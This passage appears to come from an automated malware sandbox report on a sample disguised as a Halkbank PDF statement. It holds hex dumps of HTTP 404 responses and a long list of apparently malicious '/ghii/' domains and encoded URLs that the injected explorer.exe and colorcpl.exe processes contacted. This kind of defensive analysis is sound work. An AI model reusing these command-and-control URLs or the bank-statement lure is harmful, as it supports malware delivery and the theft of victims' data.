6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Feb 2023 10:24:30 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Feb 2023 10:24:36 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Feb 2023 10:24:38 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Feb 2023 10:24:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://ladybillplanet.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 79c688f65ee62c22-FRAContent-Encoding: gzipData Raw: 32 33 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d db 8e dc 46 96 e0 b3 ea 2b 42 14 4a 95 69 93 4c de 93 99 59 59 6e 5b 96 dd 5e cb 97 b5 e4 35 ba 65 41 88 24 23 33 a9 62 92 34 23 b2 b2 ca e5 02 fa a1 1f 06 8b 05 e6 61 dc c0 62 d7 33 98 79 58 60 5f 16 e8 dd e9 dd e9 87 de fd 20 cb fd 0f 8b 13 11 64 92 99 cc 4b 55 49 c6 60 ac 12 54 45 46 9c 5b 9c 38 71 e2 c4 95 c7 77 df ff ec c1 93 df 7c fe 10 4d d9 2c 3e 39 38 86 3f 28 c6 c9 64 a8 9c a6 da c7 5f 28 90 46 70 78 72 70 e7 78 46 18 46 c1 14 e7 94 b0 a1 f2 e5 93 0f 34 5f 29 d3 13 3c 23 c3 a3 3c 1d a5 8c 1e a1 20 4d 18 49 d8 f0 28 49 a3 24 24 e7 2a 1a a7 71 9c 2e 8e 50 e7 e4 a0 82 a0 9c 45 64 91 a5 39 53 4a 14 65 11 85 6c 3a 0c c9 59 14 10 8d bf a8 28 4a 22 16 e1 58 a3 01 8e c9 d0 e4 6c ef 6a 1a 7a 32 8d 28 a2 11 23 28 a2 28 cd 58 34 8b be 25 21 5a 44 6c 8a d8 94 a0 df a4 98 32 f4 f8 e1 67 28 8b e7 93 28 41 67 96 a1 9b 48 43 53 c6 32 da ef 74 2e 00 40 0f d2 59 67 91 e6 61 96 13 4a 3b 02 94 76 28 49 3b 48 d3 80 17 8b 58 4c 4e 3e c7 13 82 92 94 a1 71 3a 4f 42 a4 a1 1f ff d7 ff fd e9 1f 7f 40 3f fe cf 3f fd f8 c7 3f a0 97 7f fb fb 9f fe eb ef 7e fa fb 3f 1d 77 04 7c a1 9b 2c 4f 33 92 b3 8b a1 92 4e fa 71 0a 65 a8 94 f7 34 7d fe f1 17 0a 28 a6 09 9c 53 aa 40 ef 2b c3 46 82 a0 ad e7 a0 fc 0a d1 ed 34 68 90 47 19 43 ec 22 23 43 05 67 59 1c 05 98 45 69 d2 89 c3 b7 5f d0 34 51 50 10 63 4a 87 0a 57 a6 46 83 29 99 61 6d 92 e3 6c aa 9c 5c 2a bf e2 6c ce 99 d2 57 0a ad 0b 10 3d cd 27 8a aa fc 4a 40 f6 9f 5e 2a bf 02 1e 4a 5f f9 8a 8c 1e 47 8c 40 66 14 56 f0 62 1c 5e 8c a2 38 ce 62 9c 10 51 6d f7 16 64 44 05 ec 3c 8f b7 c3 2a aa c2 0b de df 58 60 55 09 89 28 6e 94 26 00 f7 97 ff 81 fe fa 87 df ff f4 5f be ff eb 1f 7e 28 54 fd f2 8f 7f 5b 60 fe f4 8f 7f 78 f9 cf 7f 7a f9 df fe 82 7e fa e3 ff fb e9 ef 7f ff d3 df fc 67 f4 d3 3f fc cd cb ff f8 3d 7a f9 e7 ef 5f fe d3 0f 3f fe cb 9f 15 55 c9 52 d0 73 84 e3 77 03 41 b8 52 d6 c7 04 e7 c1 54 66 a8 0a c3 f9 84 30 a5 bf 04 78 98 b0 fc e2 f3 34 4a 98 28 e3 13 32 cb 62 cc c8 f6 b2 be 43 87 97 94 93 7e ce 48 3e 7b 4e 59 1e 25 93 2b e5 4a 55 be 99 93 fc 42 8b 92 6c 0e 75 92 93 6f e6 51 4e 42 d1 20 d7 51 94 ab 67 aa 12 25 8f 70 32 99 e3 09 70 15 8e e1 ea d9 d5 71 47 e8 Data Ascii: 2390}F+BJiLYYn[^5eA$#3b4#ab3yX`_ dKUI`TEF[8qw|M,>98?(d_(FpxrpxFF4_)<#< MI(I$$*q.PEd9SJel:Y(J"
          Source: colorcpl.exe, 00000005.00000002.570570309.0000000005F50000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ladybillplanet.com/ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com/ghii/
          Source: explorer.exe, 00000004.00000000.320111169.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/
          Source: colorcpl.exe, 00000005.00000002.571083192.0000000007C19000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.568364047.000000000357A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/?1LM=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com/ghii/
          Source: explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com/h
          Source: explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com
